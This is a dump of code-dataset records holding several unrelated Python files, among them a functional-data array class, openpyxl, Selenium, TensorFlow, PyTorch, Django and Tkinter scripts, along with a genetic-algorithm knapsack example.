#####################################################################\n # Numpy methods\n #####################################################################\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):\n\n for i in inputs:\n if isinstance(i, FDataGrid) and not np.array_equal(\n i.grid_points, self.grid_points):\n return NotImplemented\n\n new_inputs = [i.data_matrix if isinstance(i, FDataGrid)\n else i for i in inputs]\n\n outputs = kwargs.pop('out', None)\n if outputs:\n new_outputs = [o.data_matrix if isinstance(o, FDataGrid)\n else o for o in outputs]\n kwargs['out'] = tuple(new_outputs)\n else:\n new_outputs = (None,) * ufunc.nout\n\n results = getattr(ufunc, method)(*new_inputs, **kwargs)\n if results is NotImplemented:\n return NotImplemented\n\n if ufunc.nout == 1:\n results = (results,)\n\n results = tuple((result\n if output is None else output)\n for result, output in zip(results, new_outputs))\n\n results = [self.copy(data_matrix=r) for r in results]\n\n return results[0] if len(results) == 1 else results\n\n #####################################################################\n # Pandas ExtensionArray methods\n #####################################################################\n @property\n def dtype(self):\n \"\"\"The dtype for this extension array, FDataGridDType\"\"\"\n return FDataGridDType(\n grid_points=self.grid_points,\n domain_range=self.domain_range,\n dim_codomain=self.dim_codomain)\n\n @property\n def nbytes(self) -> int:\n \"\"\"\n The number of bytes needed to store this object in memory.\n \"\"\"\n return self.data_matrix.nbytes + sum(\n p.nbytes for p in self.grid_points)\n\n def isna(self):\n \"\"\"\n A 1-D array indicating if each value is missing.\n\n Returns:\n na_values (np.ndarray): Positions of NA.\n \"\"\"\n return np.all(np.isnan(self.data_matrix),\n axis=tuple(range(1, self.data_matrix.ndim)))\n\n\nclass FDataGridDType(pandas.api.extensions.ExtensionDtype):\n \"\"\"\n DType corresponding to FDataGrid in Pandas\n \"\"\"\n name = 'FDataGrid'\n kind = 'O'\n type = FDataGrid\n na_value = pandas.NA\n\n def __init__(self, grid_points, dim_codomain, domain_range=None) -> None:\n grid_points = _tuple_of_arrays(grid_points)\n\n self.grid_points = tuple(tuple(s) for s in grid_points)\n\n if domain_range is None:\n domain_range = np.array(\n [(s[0], s[-1]) for s in self.grid_points])\n\n self.domain_range = _domain_range(domain_range)\n self.dim_codomain = dim_codomain\n\n @classmethod\n def construct_array_type(cls):\n return FDataGrid\n\n def _na_repr(self) -> FDataGrid:\n\n shape = ((1,)\n + tuple(len(s) for s in self.grid_points)\n + (self.dim_codomain,))\n\n data_matrix = np.full(shape=shape, fill_value=np.NaN)\n\n return FDataGrid(\n grid_points=self.grid_points,\n domain_range=self.domain_range,\n data_matrix=data_matrix)\n\n def __eq__(self, other: Any) -> bool:\n \"\"\"\n Rules for equality (similar to categorical):\n 1) Any FData is equal to the string 'category'\n 2) Any FData is equal to itself\n 3) Otherwise, they are equal if the arguments are equal.\n 6) Any other comparison returns False\n \"\"\"\n if isinstance(other, str):\n return other == self.name\n elif other is self:\n return True\n else:\n return (isinstance(other, FDataGridDType)\n and self.dim_codomain == other.dim_codomain\n and self.domain_range == other.domain_range\n and self.grid_points == other.grid_points)\n\n def __hash__(self) -> int:\n return hash((self.grid_points,\n self.domain_range, self.dim_codomain))\n","sub_path":"skfda/representation/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":43963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"225830516","text":"from openpyxl.worksheet.table import Table, TableStyleInfo\nfrom openpyxl.drawing.image import Image\nfrom openpyxl import load_workbook\n\n\nwb= load_workbook('Pie.xlsx') #hali hazırda var olan excel'i çağırdık\nws = wb.active\n\n#tablo eklemek için:\ntab= Table(displayName='Table1', ref='A1:B5')\nstyle= TableStyleInfo(name='TableStyleMedium9', showFirstColumn=False, showLastColumn=False,\n showRowStripes=True, showColumnStripes=True)\ntab.tableStyleInfo = style\nws.add_table(tab)\nwb.save('table.xlsx')\n\n#image eklemek için:\nimg = Image('madecraft.jpg')\nimg.height = img.height * .5 #boyunu gerçeğinin yarısına indirdim\nimg.width = img.width * .5 #genişliğini gerçeğinin yarısına indirdim\nws.add_image(img, 'B7')\nwb.save('image.xlsx')","sub_path":"8.table.py","file_name":"8.table.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"203730151","text":"#-*-coding:utf-8-*-\n#@作者:haiyu.ma\n#@创建日期:2020-05-31 0:05\n\n#正常用例\n#前提条件:\n######尽量不要依赖测 试坏境数据,如果没有,就自己造 环境#####\n# 1、用户已登陆\n# 2、有能够投资的标 #如果没有标,则先加标。 #接口的方式加标。\n# 3、用户有余额可以投资\n #1、1个亿\n #2、接口方式:查询当前用户还有多少钱。>6000 不用充值。如果小于用例中投资的金额,那就充值\n#步骤\n#1、在首页选标 -- 不根据标名,根据抢投标。 默认第一个标。\n### 标页面-- 获取一下投资前的用户余额\n#2、标页面 -- 输入投资金额、点击投资按钮\n#3、标页面--点击投资成功的弹出框 查看并激活,进入个人页面\n#断言\n#钱 投资后的金额,是不是少了投资的量。\n# 个人页面 获取 投资后的金额\n# 投资前的金额额减去投资后的金额 = 投资金额\n# 投资记录对不对\n\n# 异常用例:非常好创造环境,非常好写的\n\n# 不考虑自动化实现的--不好实现,建议手工\n# 异常用例:全投操作 ? 标的可投金额 > 个人余额\n # 投资金额 > 标的可投金额 #满足这种条件标 、用户\n\nfrom selenium import webdriver\nfrom PageObjects.login_page import LoginPage\nfrom PageObjects.index_page import IndexPage\nfrom PageObjects.bid_page import BidPage\nfrom PageObjects.user_page import UserPage\n\nimport unittest\nimport ddt # from ddt import ddt,data\nimport logging\nimport time\nfrom TestDatas import Common_Datas as CD\nfrom TestDatas.IndexModuleDatas import index_datas as ID\nimport pytest\n\n@ddt.ddt\nclass TestInvest (unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # 初始化浏览器会话\n logging. info (\"===用例类前置:初始化浏览器会话,登陆前程贷系统=======\")\n cls.driver = webdriver.Chrome()\n cls.driver.maximize_window()\n cls.driver.get(CD.web_login_url)\n LoginPage(cls.driver).login(CD.user, CD. passwd)\n # 首页 - 选一个标来投资 - 直接选第一个标 -- / 随机选一个\n IndexPage(cls.driver).click_first_bid()\n cls.bid_page = BidPage(cls. driver)\n\n @classmethod\n def tearDownClass(cls):\n logging. info (\"=====用例类后置:关闭浏览器会话, 清理环境=======\")\n cls. driver, quit()\n\n def tearDown(self):\n logging.info(\"=====每一个用例后置: 刷新当前页面=======\")\n self.driver.refresh()\n time.sleep(0.5)\n\n @pytest.mark.smoke\n def test_invest_l_success(self):\n logging.info(\"*******投资用例: 正常场景 - 投资成功*******\")\n # 标页面 - 获取投资前的个人余额\n userMoney_beforeInvest = self.bid_page.get_user_money()\n # 标页面 - 输入投资金额,点击投标按钮\n self.bid_page.invest(ID.success[\"money\"])\n # 标页面 - 投资成功弹出框,点击查看并激活按钮\n self.bid_page.click_activeButton_on_success_popup()\n # #验证\n # 个人页面-获取用户当前余额\n userMoney_afterInvest = UserPage(self.driver).get_user_leftMoney()\n # 1、余额:投资前获取一下,投资后再获取一下。求差值,如果等于投资金额,那正确。\n assert ID.success[\"money\"] == int(float(userMoney_beforeInvest)-(float(userMoney_afterInvest)))\n # PS:自动化测试独立帐号。\n # 2、个人页面- 投资记录获取。\n\n ddt.data(*ID.wrong_format_money)\n\n def test_invest_0_failed_by_No100(self, data):\n logging.info(\"********投资用例: 异常场景:投资金额为非100的整数倍、错误的格式等*****\")\n # 标页面-获取投资前的个人余额\n userMoney_beforeInvest = self.bid_page.get_user_money()\n # 标页面-输入投资金额, 点击投标按钮\n self.bid_page.invest(data[\"money\"])\n # 获取提示信息\n errorMsg = self.bid_page.get_errorMsg_from_pageCenter()\n # 刷新\n self.driver.refresh()\n # 获取用户余额\n userMoney_afterInvest = self.bid_page.get_user_money()\n # 断言\n assert errorMsg == data[\"check\"]\n assert userMoney_afterInvest == userMoney_beforeInvest\n","sub_path":"WebAutomation/TestCases/InvestModuleTest/test_invest.py","file_name":"test_invest.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"51189408","text":"from knapsack.config import Config\nfrom knapsack.genetic_algorithm import GeneticAlgorithmFacade\nfrom knapsack.generation import GenerationStrategy\nfrom knapsack.mutation import MutationStrategy\nfrom knapsack.problem import ProblemType\nfrom knapsack.reproduction import ReproductionStrategy\nfrom knapsack.selection import SelectionStrategy\nfrom knapsack.stop_criteria import StopCriteriaType\n\nimport matplotlib.pyplot as plt\n\n\ndef plot_fitness(generationsResult):\n best = list(map(lambda result: result[\"best\"], generationsResult))\n mean = list(map(lambda result: result[\"mean\"], generationsResult))\n worst = list(map(lambda result: result[\"worst\"], generationsResult))\n plt.plot(best, label=\"best\")\n plt.plot(mean, label=\"mean\")\n plt.plot(worst, label=\"worst\")\n\n plt.xlabel(\"Generation\")\n plt.ylabel(\"Fitness\")\n plt.title(\"Knapsack Problem\")\n plt.legend(loc='lower left', frameon=True)\n\n plt.show()\n\nif __name__ == \"__main__\":\n config = Config({\n 'problem': {\n 'type': ProblemType.MAXIMIZATION,\n 'values': [0, 1],\n 'costs': [100, 350, 200, 90, 500, 250, 220, 360, 150, 700, 400, 230, 550],\n 'weights': [50, 90, 30, 40, 100, 70, 20, 80, 80, 90, 50, 30, 70],\n 'cargo': 600\n },\n 'selection': {\n 'strategy': SelectionStrategy.TOURNAMENT_BATTLE_ROYALE\n },\n 'reproduction': {\n 'strategy': ReproductionStrategy.SEXUAL_SINGLE_POINT,\n 'rate': 0.4\n },\n 'mutation': {\n 'strategy': MutationStrategy.SWAP,\n 'rate': 0.1\n },\n 'generation': {\n 'strategy': GenerationStrategy.EXCHANGE,\n #'substituted_population_size': 10, #Used only on STEADY_STATE\n 'population_size': 25,\n },\n 'stop_criteria': {\n #'fitness': 0, #Used only on MAX_FITNESS\n #'num_generations': 100, #Used only on MAX_GENERATIONS and STEADY_PERIOD\n 'quorum': 0.95, #Used only on CONVERGENCE\n 'type': StopCriteriaType.MAX_GENERATIONS\n }\n })\n\n\n\n generationsResult = GeneticAlgorithmFacade(config).execute()\n\n plot_fitness(generationsResult)","sub_path":"knapsack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"428376271","text":"# Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# --------------------------------------------------------\n# References:\n# MAE: https://github.com/facebookresearch/mae\n# --------------------------------------------------------\n\nimport json\n\n\ndef param_groups_lrd(model,\n weight_decay=0.05,\n no_weight_decay_list=[],\n layer_decay=.75,\n num_layers=None):\n \"\"\"\n Parameter groups for layer-wise lr decay\n Following BEiT: https://github.com/microsoft/unilm/blob/master/beit/optim_factory.py#L58\n \"\"\"\n param_group_names = {}\n param_groups = {}\n\n if num_layers == None:\n num_layers = len(model.blocks) + 1\n\n layer_scales = list(layer_decay**(num_layers - i)\n for i in range(num_layers + 1))\n\n for n, p in model.named_parameters():\n if p.stop_gradient:\n continue\n\n if 'teacher' in n:\n continue\n\n # no decay: all 1D parameters and model specific ones\n if p.ndim == 1 or n in no_weight_decay_list:\n g_decay = \"no_decay\"\n this_decay = 0.\n else:\n g_decay = \"decay\"\n this_decay = weight_decay\n\n layer_id = get_layer_id_for_vit(n, num_layers)\n group_name = \"layer_%d_%s\" % (layer_id, g_decay)\n\n if group_name not in param_group_names:\n this_scale = layer_scales[layer_id]\n\n param_group_names[group_name] = {\n \"lr_scale\": this_scale,\n \"weight_decay\": this_decay,\n \"params\": [],\n }\n param_groups[group_name] = {\n \"lr_scale\": this_scale,\n \"weight_decay\": this_decay,\n \"params\": [],\n }\n\n param_group_names[group_name][\"params\"].append(n)\n param_groups[group_name][\"params\"].append(p)\n\n # print(\"parameter groups: \\n%s\" % json.dumps(param_group_names, indent=2))\n\n return list(param_groups.values())\n\n\ndef get_layer_id_for_vit(name, num_layers):\n \"\"\"\n Assign a parameter with its layer id\n Following BEiT: https://github.com/microsoft/unilm/blob/master/beit/optim_factory.py#L33\n \"\"\"\n if name in (\"cls_token\", \"mask_token\", \"pos_embed\"):\n return 0\n elif name.startswith(\"patch_embed\"):\n return 0\n elif name.startswith(\"blocks\"):\n return int(name.split('.')[1]) + 1\n else:\n return num_layers - 1\n","sub_path":"task/ssl/cae/util/lr_decay.py","file_name":"lr_decay.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"166220939","text":"import numpy as np\nimport tensorflow as tf\nimport sys, os\nparent_folder_path = os.path.dirname(os.path.dirname( os.path.dirname( os.path.dirname( os.path.abspath(__file__)))))\nsys.path.append(parent_folder_path)\nfrom src.tf_module.models.BaseModel import ClassifierModel\n\nclass mlp_classifier(ClassifierModel):\n def __init__(self, config, scope=\"mlp_network\"):\n ClassifierModel.__init__(self,scope,config)\n \n def build_model(self):\n train_output = self.mlp_model(self.inputs, reuse= False)\n self.test_output = self.mlp_model(self.inputs, reuse=True)\n with tf.variable_scope(\"train_op\"): \n loss = tf.reduce_mean(tf.losses.softmax_cross_entropy(onehot_labels=self.labels, logits= train_output))\n self.optimizer = tf.train.RMSPropOptimizer(learning_rate=self.learning_rate).minimize(loss, name='optimizer')\n self.summary_train = tf.summary.scalar(\"loss_train_data\", loss)\n\n with tf.variable_scope(\"test_op\"):\n test_loss = tf.reduce_mean(tf.losses.softmax_cross_entropy(onehot_labels=self.labels, logits= self.test_output))\n test_loss_summary = tf.summary.scalar(\"loss_test_data\", test_loss)\n \n correct_pred = tf.equal(tf.argmax(self.test_output, 1), tf.argmax(self.labels, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32), name='accuracy')\n test_accuracy_summary = tf.summary.scalar(\"accuracy_test_data\", accuracy)\n self.summary_test = tf.summary.merge([test_loss_summary,test_accuracy_summary])\n\n with tf.variable_scope(\"predict_op\"): \n tf.argmax(self.test_output, 1,name=\"predict_hard\")\n tf.nn.softmax(self.test_output, name=\"predict_soft\")\n \n\n def mlp_model(self, network_input, reuse=False):\n g = tf.nn.tanh\n with tf.variable_scope(self.scope,reuse=reuse):\n L1 = tf.layers.dense(inputs=network_input, units= 32, activation=g)\n L1 = tf.nn.dropout(L1, keep_prob=self.keep_prob)\n L2 = tf.layers.dense(inputs=L1, units= 32, activation=g)\n L2 = tf.nn.dropout(L2, keep_prob=self.keep_prob)\n L3 = tf.layers.dense(inputs=L2, units= 16, activation=g)\n mlp_output = tf.layers.dense(inputs=L3, units= self.n_classes,name='mlp_out')\n return mlp_output","sub_path":"src/tf_module/models/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"350786398","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('risks', '0101_eventimportattributes_adm_level_precision'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EventFurtherAdministrativeDivisionAssociation',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ],\n options={\n 'db_table': 'risks_eventfurtheradministrativedivisionassociation',\n },\n ),\n migrations.AlterModelOptions(\n name='event',\n options={},\n ),\n migrations.AlterModelOptions(\n name='eventimportattributes',\n options={'ordering': ['riskapp', 'region', 'riskanalysis', 'adm_level_precision'], 'verbose_name': 'Risks Analysis: Import Events Data (Attributes) from XLSX file', 'verbose_name_plural': 'Risks Analysis: Import Events Data (Atributes) from XLSX file'},\n ),\n migrations.AddField(\n model_name='eventfurtheradministrativedivisionassociation',\n name='event',\n field=models.ForeignKey(to='risks.Event'),\n ),\n migrations.AddField(\n model_name='eventfurtheradministrativedivisionassociation',\n name='f_adm',\n field=models.ForeignKey(to='risks.AdministrativeDivisionMappings'),\n ),\n migrations.AddField(\n model_name='event',\n name='further_administrative_divisions',\n field=models.ManyToManyField(related_name='event_further_adm', through='risks.EventFurtherAdministrativeDivisionAssociation', to='risks.AdministrativeDivisionMappings'),\n ),\n ]\n","sub_path":"risks/migrations/0102_auto_20181015_1351.py","file_name":"0102_auto_20181015_1351.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"257564517","text":"import re\nimport os \n\nfilepath = '../log'\n\nfile = open('../log', 'r')\nlines = file.readlines()\n\nfor index, line in enumerate(lines):\n #print(\"Line {}: {}\".format(index, line.strip()))\n if 'png' in line.strip():\n result = re.search('textwidth]{(.*)png}', line.strip())\n if index < 35:\n os.system('cp '+result.group(1)+'png'+' paperplots')\n else: \n os.system('cp '+result.group(1)+'png'+' paperplots2')\n if 'pdf' in line.strip():\n result = re.search('textwidth]{(.*)pdf}', line.strip())\n if index < 35:\n os.system('cp '+result.group(1)+'pdf'+' paperplots')\n else: \n os.system('cp '+result.group(1)+'pdf'+' paperplots2')\n print(result.group(1))\n\n \nfile.close()\n\n'''\nwith open(filepath) as fp:\n line = fp.readline()\n while line:\n s = line.readline()\n result = re.search('{(.*)}', s)\n\n #s = s.substring(s.indexOf(\"{\") + 1);\n #s = s.substring(0, s.indexOf(\"}\"));\n print result\n'''\n\n\n\n","sub_path":"strippull.py","file_name":"strippull.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"590390943","text":"import tkinter\r\n\r\nclass EditPurchase(tkinter.Frame):\r\n\r\n def __init__(self, parent, App):\r\n self.application = App\r\n self.config = App.config\r\n super().__init__(parent)\r\n self.configure(bg=\"cyan\")\r\n\r\n self.grid(row=0, column=0, sticky=\"nsew\")\r\n parent.grid_rowconfigure(0, weight=1)\r\n parent.grid_columnconfigure(0, weight=1)\r\n\r\n self.purchases = self.config.load_purchase()\r\n\r\n self.title_frame = tkinter.Frame(self, relief=tkinter.RIDGE, bg=\"cyan\")\r\n self.title_frame.place(x=0, y=0, width=729, height=100)\r\n\r\n self.title_label = tkinter.Label(self.title_frame, text=\"Add New Purchase\", bd=5, relief=tkinter.RIDGE, bg=\"cyan\",\r\n fg=\"black\", font=(\"roboto sans-serif\", 24), pady=17)\r\n self.title_label.pack(side=tkinter.TOP, fill=tkinter.X)\r\n\r\n self.form_frame = tkinter.Frame(self, bd=5, relief=tkinter.RIDGE, bg=\"cyan\")\r\n self.form_frame.place(x=0, y=75, width=729, height=425)\r\n\r\n self.customer_name_text = tkinter.StringVar()\r\n self.customer_name_label = tkinter.Label(self.form_frame, text=\"Customer :\", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=7, pady=30)\r\n self.customer_name_label.grid(row=3, column=3, sticky=tkinter.W)\r\n self.customer_entry = tkinter.Entry(self.form_frame, textvariable=self.customer_name_text, width=20, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.customer_entry.grid(row=3, column=4)\r\n\r\n self.product_name_text = tkinter.StringVar()\r\n self.product_name_label = tkinter.Label(self.form_frame, text=\"Product :\", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.product_name_label.grid(row=3, column=5, sticky=tkinter.W)\r\n self.product_entry = tkinter.Entry(self.form_frame, textvariable=self.product_name_text, width=18, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.product_entry.grid(row=3, column=6)\r\n\r\n self.amount_text = tkinter.StringVar()\r\n self.amount_label = tkinter.Label(self.form_frame, text=\"Amount : \", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=7, pady=30)\r\n self.amount_label.grid(row=4, column=3, sticky=tkinter.W)\r\n self.amount_entry = tkinter.Entry(self.form_frame, textvariable=self.amount_text, width=20, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.amount_entry.grid(row=4, column=4)\r\n\r\n self.address_text = tkinter.StringVar()\r\n self.address_label = tkinter.Label(self.form_frame, text=\"Address : \", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.address_label.grid(row=4, column=5, sticky=tkinter.W)\r\n self.address_entry = tkinter.Entry(self.form_frame, textvariable=self.address_text, width=18, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.address_entry.grid(row=4, column=6)\r\n\r\n self.date_text = tkinter.StringVar()\r\n self.date_label = tkinter.Label(self.form_frame, text=\"Transact Date : \", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.date_label.grid(row=5, column=3, sticky=tkinter.W)\r\n self.date_entry = tkinter.Entry(self.form_frame, textvariable=self.date_text, width=20, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.date_entry.grid(row=5, column=4)\r\n\r\n self.price_text = tkinter.StringVar()\r\n self.price_label = tkinter.Label(self.form_frame, text=\"Price : \", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.price_label.grid(row=5, column=5, sticky=tkinter.W)\r\n self.price_entry = tkinter.Entry(self.form_frame, textvariable=self.price_text, width=18, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.price_entry.grid(row=5, column=6)\r\n\r\n self.retailer_text = tkinter.StringVar()\r\n self.retailer_label = tkinter.Label(self.form_frame, text=\"Retailer :\", font=(\"roboto sans-serif\", 14), bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.retailer_label.grid(row=6, column=3, sticky=tkinter.W)\r\n self.retailer_entry = tkinter.Entry(self.form_frame, textvariable=self.retailer_text, width=20, bd=5, font=(\"roboto sans-serif\", 14))\r\n self.retailer_entry.grid(row=6, column=4)\r\n\r\n\r\n self.button_frame = tkinter.Frame(self.form_frame, bd=0, relief=tkinter.RIDGE, bg=\"cyan\")\r\n self.button_frame.place(x=0, y=340, width=720, height=170)\r\n\r\n self.space = tkinter.Label(self.button_frame, text=\" \", font=(\"roboto sans-serif\", 14),\r\n fg=\"white\", bg=\"cyan\")\r\n self.space.grid(row=2, column=3)\r\n\r\n self.add_purchase_button = tkinter.Button(self.button_frame, text=\"Submit\", width=15, height=1, bd=2,\r\n relief=tkinter.FLAT, font=(\"roboto sans-serif\", 12, \"bold\"), command=lambda:self.application.add_purchase())\r\n self.add_purchase_button.grid(row=2, column=4, padx=60, pady=34)\r\n self.cancel_button = tkinter.Button(self.button_frame, text=\"Cancel\", width=15, height=1, bd=2,\r\n relief=tkinter.FLAT, font=(\"roboto sans-serif\", 12, \"bold\"),\r\n command=lambda:self.application.gotopurchase())\r\n self.cancel_button.grid(row=2, column=5, pady=34, padx=15)","sub_path":"edit_purchase.py","file_name":"edit_purchase.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"163825195","text":"__author__ = 'BR'\n\n\"\"\"\nAuthor: BIKASH ROY\n\nFile name: dbtransaction.py\n\"\"\"\n\n\nimport psycopg2\n\n\ndef main():\n connection = psycopg2.connect(\n host='localhost',\n dbname='sample_db',\n port='5432',\n user='',\n password=''\n )\n\n try:\n cursor = connection.cursor()\n connection.cursor()\n sql = \"INSERT INTO principals (tconst, nconst, category) VALUES (%s, %s, %s)\"\n val = [\n ('tt00103', 'tt89283', 'Producer'),\n ('tt00104', 'tt89282', bool),\n ('tt00105', 'tt89284', 'Actor')\n ]\n\n cursor.executemany(sql, val)\n connection.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if connection is not None:\n connection.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Big_Data/tsvtosql.py","file_name":"tsvtosql.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"572791075","text":"#\r\n# Sam Ghalayini\r\n# HW 23 Singly Linked Lists\r\n#\r\n# CLASS NOTES + Homework\r\nclass Node:\r\n def __init__(self,data):\r\n self.data = data\r\n self.next = None\r\n \r\nclass linkedList:\r\n def __init__(self):\r\n self.head = None\r\n def append(self,data):\r\n newNode = Node(data)\r\n if self.head == None:\r\n self.head = newNode\r\n return\r\n else:\r\n lastNode = self.head \r\n while lastNode.next != None:\r\n lastNode = lastNode.next\r\n lastNode.next = newNode\r\n def prepend(self,data):\r\n newNode = Node(data)\r\n if self.head == None:\r\n self.head = newNode\r\n return\r\n else:\r\n newNode.next = self.head\r\n self.head = newNode\r\n def insertAfter(self,prevNode,data):\r\n newNode = Node(data)\r\n newNode.next = prevNode.next\r\n prevNode.next = newNode\r\n def deleteNode(self,key):\r\n curNode = self.head\r\n if curNode != None and curNode.data ==key:\r\n self.head =curNode.next\r\n curNode = Node\r\n return\r\n else:\r\n prevNode = None\r\n while curNode != None and curNode.data != key:\r\n prevNode = curNode\r\n curNode = curNode.next\r\n if curNode == None:\r\n print(\"Error cannot delete node\")\r\n else:\r\n prevNode.next = curNode.next\r\n curNode = None\r\n def length(self):\r\n count = 0\r\n curNode = self.head\r\n while curNode != None:\r\n curNode = curNode.next\r\n count += 1\r\n return count\r\n def swap(self,val,val1):\r\n if(val==val1): # case 1: same node\r\n print(\"Same node.\")\r\n prev = None # case 2: swap with head\r\n curNode = self.head\r\n while curNode != None and curNode.data != val:\r\n prev = curNode\r\n curNode = curNode.next\r\n prev1 = None # case 3: swap nodes\r\n curNode1 = self.head\r\n while curNode1 != None and curNode1.data != val1:\r\n prev1 = curNode1\r\n curNode1 = curNode1.next\r\n if curNode == None or curNode == None: # case 4: invalid input for one of the node values\r\n print(\"At least one of the nodes doesn't exist\")\r\n else:\r\n if prev == None:\r\n self.head = curNode1\r\n prev1.next = curNode\r\n elif prev1 == None:\r\n self.head = curNode\r\n prev.next = curNode1\r\n else:\r\n prev.next = curNode1\r\n prev1.next = curNode\r\n temp = curNode.next\r\n temp1 = curNode1.next\r\n curNode.next= temp1\r\n curNode1.next = temp\r\n def reverse(self):\r\n prev = None\r\n curNode = self.head\r\n while curNode != None: # iterate through linked list\r\n temp = curNode.next\r\n curNode.next = prev\r\n prev = curNode\r\n curNode = temp\r\n self.head = prev # last iteration so last node will equal the head\r\n def deletePos(self,pos):\r\n curNode = self.head\r\n if pos == 0:\r\n self.head = curNode.nextcurNode = None\r\n return\r\n else:\r\n count = 0\r\n prev = None\r\n while curNode != None and count != pos:\r\n prev = curNode\r\n curNode = curNode.next\r\n count+=1\r\n if curNode == None:\r\n print(\"Node doesn't exist\")\r\n return\r\n else:\r\n prev.next = curNode.next\r\n curNode = None\r\n def printList(self):\r\n curNode = self.head\r\n while curNode != None: # changed from curNode.next to curNode and it works correctly\r\n print(curNode.data)\r\n curNode = curNode.next\r\n print(\"\")\r\n \r\nlink = linkedList() # instantiate linked list object\r\nlink.append(5) # pop\r\nlink.printList()\r\nlink.append(6) # pop\r\nlink.printList()\r\nlink.prepend(7) # pop back\r\nlink.printList()\r\nlink.insertAfter(link.head,8) # pop after head\r\nlink.printList()\r\nlink.deleteNode(5) # delete 5 node\r\nlink.printList() \r\nprint(\"Current length of list: \",link.length(), '\\n')\r\nlink.swap(7,6) # swap 7 and 6 nodes\r\nlink.printList()\r\nlink.reverse()\r\nlink.printList()\r\nlink.insertAfter(link.head,8)\r\nlink.printList()\r\nlink.deletePos(2) # delete at position 2\r\nlink.printList()\r\n","sub_path":"HW23_Linked_Lists.py","file_name":"HW23_Linked_Lists.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"277140841","text":"import torch\nimport torch.nn as nn\nimport torch.functional as F\nimport torch.optim as optim\n\nfrom tqdm import tqdm_notebook\nimport pandas as po\nimport numpy as np\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\ndef train(train_dataloader, window_size, model, loss_function, optimizer, num_epochs, input_dim, hidden_dim, dropout_prob):\n \n hidden_state = torch.randn(1, 1, hidden_dim)\n cell_state = torch.randn(1, 1, hidden_dim)\n \n losses = []\n \n model.train()\n for epoch in range(int(num_epochs)):\n print('Training epoch {}'.format(epoch+1))\n for step, batch in enumerate(train_dataloader):\n b_inputs = batch[0].tolist()\n b_target = batch[1].tolist()\n\n for i in range(window_size, len(b_inputs)):\n model.zero_grad()\n optimizer.zero_grad()\n\n input_ = torch.tensor(np.array(b_inputs[i-window_size:i]), dtype = torch.float).view(window_size, 1, input_dim).to(device)\n prediction, (hidden_state, cell_state) = model(input_, hidden_state, cell_state)\n prediction = prediction.view(1).to(device) \n\n target = torch.tensor([b_target[i]]).to(device)\n hidden_state.detach_()\n cell_state.detach_()\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), 0.25)\n loss = loss_function(prediction, target)\n loss.backward()\n optimizer.step()\n losses.append(loss.item())\n \n print('Loss after {} epochs = {}'.format(epoch + 1, loss))\n \n return model, hidden_state, cell_state, losses\n\n\n\n","sub_path":".ipynb_checkpoints/trainer-checkpoint.py","file_name":"trainer-checkpoint.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 